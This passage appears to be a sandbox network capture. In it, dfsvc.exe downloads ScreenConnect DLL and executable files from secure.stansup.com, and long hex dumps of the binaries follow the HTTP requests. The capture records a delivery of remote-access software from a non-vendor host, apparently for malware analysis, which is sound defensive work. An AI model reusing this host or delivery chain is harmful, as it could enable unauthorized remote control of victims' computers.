                                                                                                                                                                                                                                                      2024-10-25 17:29:41 UTC16384INData Raw: 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 00 42 6c 6f 63 6b 43 6f 70 79 00 61 6c 6c 6f 77 43 6f 70 79 00 65 6e 74 72 6f 70 79 00 54 72 79 00 54 6f 6b 65 6e 50 72 69 6d 61 72 79 00 54 6f 44 69 63 74 69 6f 6e 61 72 79 00 4c 6f 61 64 4c 69 62 72 61 72 79 00 46 72 65 65 4c 69 62 72 61 72 79 00 49 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 4c 6f 61 64 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 46 72 65 65 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 44 69 73 6b 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 4d 65 6d 6f 72 79 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 4f 62 6a 65 63 74 51 75 65 72 79 00 53 65 6c
                                                                                                                                                                                                                                                      Data Ascii: lypointlySelectManyShutdownBlockReasonDestroyBlockCopyallowCopyentropyTryTokenPrimaryToDictionaryLoadLibraryFreeLibraryINativeLibraryTryLoadNativeLibraryTryFreeNativeLibraryWindowsDiskNativeLibraryWindowsMemoryNativeLibraryObjectQuerySel


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      10192.168.2.54978079.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:44 UTC102OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:29:45 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 68096
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:45 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:45 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 6b f4 c6 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 e1 02 02 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELk" 0 @ @
                                                                                                                                                                                                                                                      2024-10-25 17:29:45 UTC16384INData Raw: 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
                                                                                                                                                                                                                                                      2024-10-25 17:29:45 UTC16384INData Raw: 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 02
                                                                                                                                                                                                                                                      Data Ascii: --.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                                                                                                                      2024-10-25 17:29:45 UTC16384INData Raw: 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e 76
                                                                                                                                                                                                                                                      Data Ascii: tyActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionInv
                                                                                                                                                                                                                                                      2024-10-25 17:29:45 UTC2775INData Raw: 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0f
                                                                                                                                                                                                                                                      Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      11192.168.2.54979179.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC93OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 548352
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:46 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 69 42 17 f7 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 56 08 00 00 06 00 00 00 00 00 00 c6 70 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 84 a2 08 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELiB" 0Vp @
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC16384INData Raw: 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 0e 07 00 06 04 6f 0e 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 0e 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 0e 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 01 00 0a 2a 06 2c 43 02 7b 76 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 77 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 03 6f 0e 07 00 06 7d 78 01 00 0a 02 28 2d 00 00 2b 7d 76 01
                                                                                                                                                                                                                                                      Data Ascii: (++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r*,C{v,(swsu(,+&o}x(-+}v
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC16384INData Raw: 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b2 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d1 05 00 04 25 2d 17 26 7e d0 05 00 04 fe 06 a0 0e 00 06 73 cb 02 00 0a 25 80 d1 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e2 04 00 06 28 80 00 00 2b 26 2a 00 1b 30 01 00 1a 00 00 00 75 00 00 11 02 0a 06 28 2c 01 00 0a 03 6f 08 02 00 0a 0b de 07 06 28 2d 01 00 0a dc 07 2a 00 00 01 10 00 00 02 00 08 00 09 11 00 07 00 00 00 00 3a 02 03
                                                                                                                                                                                                                                                      Data Ascii: s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((+&*0u(,o(-*:
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC16384INData Raw: 0a 03 6f 8c 01 00 0a 7e e3 05 00 04 25 2d 17 26 7e d0 05 00 04 fe 06 b2 0e 00 06 73 9f 02 00 0a 25 80 e3 05 00 04 28 b3 00 00 2b 28 67 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 93 0f 00 06 25 02 7d a0 06 00 04 2a ae 02 16 16 16 16 73 20 03 00 06 7e cf 05 00 04 25 2d 13 26 14 fe 06 3d 03 00 06 73 3b 04 00 0a 25 80 cf 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 45 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 28 d5 00 00 2b 28 45 05 00 06 28 d6 00 00 2b 2a 3a 05 2c 09 02 03 04 28 d7 00 00 2b 2a 02 2a 00 00 13 30 02 00 13 00 00 00 33 00 00 11 02 28 d5 00 00 2b 03 28 d5 00 00
                                                                                                                                                                                                                                                      Data Ascii: o~%-&~s%(+(g(r+*n((*>s%}*s ~%-&=s;%(+*(+(+-j+j(E(+*&f__`*v(+(+(+(E(+*:,(+**03(+(
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC16384INData Raw: 72 10 14 00 70 a2 25 1b 02 28 51 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 53 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 55 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 57 07 00 06 28 4f 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 59 07 00 06 0b 12 01 fe 16 29 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 5b 07 00 06 0c 12 02 fe 16 2a 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 5d 07 00 06 0d 12 03 28 2f 05 00 0a a2 28 2a 02 00 0a 2a 1e 02 28 4c 07 00 06 2a 1e 02 7b a1 02 00 04 2a 22 02 03 7d a1 02 00 04 2a 00 00 13 30 02 00 1f 00 00 00 5a 00 00 11 72 90 14 00 70 02 28 61 07 00 06 0a 12 00 fe 16 c1 00 00
                                                                                                                                                                                                                                                      Data Ascii: rp%(Q(%r"p%(S(%r4p%(U(%r2p%(W(O%rHp%(Y)oC%rhp%([*oC%rp%(](/(**(L*{*"}*0Zrp(a
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC16384INData Raw: 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d7 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 2f 0a 00 06 02 03 7d d8 03 00 04 02 04 7d d9 03 00 04 2a 1e 02 7b d8 03 00 04 2a 1e 02 7b d9 03 00 04 2a 5a 03 02 28 37 0a 00 06 5a 1e 28 12 04 00 06 02 28 38 0a 00 06 58 2a 86 02 03 04 28 36 0a 00 06 02 05 75 95 00 00 02 7d da 03 00 04 02 05 75 94 00 00 02 7d db 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b da 03 00 04 28 0f 04 00 06 02 7b db 03 00 04 28 0f 04 00 06 2a 00 00 13 30 07 00 e6 00 00 00 52 01 00 11 02 04 28 39 0a 00 06 0a 02 28 38 0a 00 06 16 fe 03 0b 02 7b da 03 00 04 2c 67 05 06 5a 0c 02 08 16 28 32
                                                                                                                                                                                                                                                      Data Ascii: |(+3*0)Q{(-tO|(+3*V(/}}*{*{*Z(7Z((8X*(6u}u}*(c,{({(*0R(9(8{,gZ(2
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC16384INData Raw: 07 04 07 6f 03 0c 00 06 02 05 07 6f 02 0c 00 06 28 03 09 00 06 6f 06 0c 00 06 28 fb 0b 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3b 04 00 04 02 04 7d 3c 04 00 04 02 05 7d 3d 04 00 04 02 0e 04 7d 3e 04 00 04 02 0e 05 7d 3f 04 00 04 2a 1e 02 7b 3b 04 00 04 2a 1e 02 7b 3c 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 00 0a 2d 1e 28 64 01 00 0a d0 81 00 00 1b 28 3c 01 00 0a 28 0c 05 00 06 6f 8c 0b 00 06 80 1b 07 00 0a de 07 06 28 2d 01 00 0a dc 7e 1b 07 00 0a 2a 00 01 10 00 00 02 00 13 00 27 3a 00 07 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: oo(o(o-,o*29(<};}<}=}>}?*{;*{<*{=*{>*{?*0G*~-:~(,~-(d(<(o(-~*':
                                                                                                                                                                                                                                                      2024-10-25 17:29:46 UTC16384INData Raw: 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 a5 0d 00 06 80 30 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 31 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 ae 0d 00 06 80 36 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 56 02 00 06 2a 22 03 04 28 5c 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 39 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 2f 02 00 06 2a 00 00 00 13 30 03 00 1b 00 00 00 b1 01 00 11 02 7b 39 05 00 04 03 16 28 f0 01 00 2b 0a 12 00 28 7b 08 00 0a 6f 31 02 00 06 2a 36 02 7b 39 05 00 04 03 6f 33 02 00 06 2a 00 00 00 13 30 02 00 1a 00 00 00 b2 01 00 11 02 7b 39
                                                                                                                                                                                                                                                      Data Ascii: sjz(<*.s0*(<*2{1oB*(<*6{o{*(<*6{o{*.s6*(<*"(V*"(\*(<*0{9(+d(zo/*0{9(+({o1*6{9o3*0{9
                                                                                                                                                                                                                                                      2024-10-25 17:29:47 UTC16384INData Raw: 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 04 10 00 06 80 23 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 1b 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 08 10 00 06 80 26 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0b 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 4b 0b 00 06 2a 3a 0f 01 fe 16 4b 01 00 02 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 2b 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c1 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a 2e 73 13 10 00 06 80 32 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 36 03 03 28 1a 02 00 2b 73 32 0a 00 0a 2a 2a 03 6f 33 0a 00 0a 14 fe 03 2a 5e 03 03 6f 34 0a 00 0a 28 bc 01 00 2b 28 f8 0b 00 06 73 35
                                                                                                                                                                                                                                                      Data Ascii: {#(1*(<*J{'{((1*.s#*(<*o*oC*.s&*(<*oC*.s(*(<*"(K*:KoC*.s+*(<*:oC*(<*.s2*(<*6(+s2**o3*^o4(+(s5
                                                                                                                                                                                                                                                      2024-10-25 17:29:47 UTC16384INData Raw: 27 3d 01 00 6d 00 9a 01 fe 02 09 01 10 00 e6 4f 01 00 27 3d 01 00 6d 00 9e 01 06 03 09 01 10 00 d9 bb 00 00 27 3d 01 00 6d 00 a0 01 14 03 09 01 10 00 96 3a 01 00 27 3d 01 00 6d 00 a2 01 1f 03 09 01 10 00 9c ff 00 00 27 3d 01 00 6d 00 a6 01 46 03 81 01 10 00 cc 3a 01 00 27 3d 01 00 35 00 a9 01 5a 03 01 20 10 00 0e e3 00 00 27 3d 01 00 35 00 ab 01 63 03 01 20 10 00 4d 34 01 00 27 3d 01 00 35 00 ae 01 7b 03 01 00 10 00 e9 7f 00 00 27 3d 01 00 35 00 b1 01 80 03 81 00 10 00 cf fc 00 00 27 3d 01 00 3c 03 b2 01 8a 03 01 00 10 00 8d fe 00 00 27 3d 01 00 24 03 b4 01 95 03 01 00 10 00 96 fd 00 00 27 3d 01 00 24 03 b6 01 99 03 01 00 10 00 fa 7f 00 00 27 3d 01 00 35 00 b6 01 9d 03 01 00 10 00 56 91 00 00 27 3d 01 00 35 00 b7 01 a7 03 01 00 10 00 47 91 00 00 27 3d 01
                                                                                                                                                                                                                                                      Data Ascii: '=mO'=m'=m:'=m'=mF:'=5Z '=5c M4'=5{'=5'=<'=$'=$'=5V'=5G'=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      12192.168.2.54980379.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:48 UTC102OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 600864
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:48 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 08 e6 df 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fa 08 00 00 06 00 00 00 00 00 00 8a 12 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 ca be 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `@
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 2c 00 00 11 73 af 07 00 06 0a 06 02 7d 15 03 00 04 28 74 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 75 01 00 0a 28 76 01 00 0a 16 8d 11 00 00 01 28 77 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 ce 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e aa 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 29 07 00 06 73 cf 01 00 0a 25 80 aa 02 00 04 28 33 00 00 2b 6f d0 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d1 01 00 0a 7d 17 03 00 04 11 04 7b 17 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 17 03 00 04 6f 18 03 00 06 28 39 06 00 06 13 06 11 04 7b 17 03 00 04 6f 2c 03 00 06 28 4d 06 00 06 13 07 11 04 7b 17 03 00 04 6f 2d 03 00 06 28 4d 06 00 06 13 08 11 04 7b 17 03 00 04 6f 18 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a 11 0e 13 09 11 05 7b 74 02 00 04 2d 21
                                                                                                                                                                                                                                                      Data Ascii: ,s}(t,rp(u(v(w}H((((~%-&~)s%(3+o8$o}{(,+{o(9{o,(M{o-(M{o(%o{t-!
                                                                                                                                                                                                                                                      2024-10-25 17:29:49 UTC16384INData Raw: 04 6f 0e 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 16 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f bb 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 16 03 00 0a 74 9b 00 00 01 17 6f 17 03 00 0a 26 02 7b 54 00 00 04 14 6f 7a 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0e 07 00 06 8c b6 00 00 02 a2 28 09 03 00 0a 02 7b 54 00 00 04 6f 0e 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f bb 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0c 03 00 0a 6f 0e 02 00 0a 2b 10 02 7b 5a 00
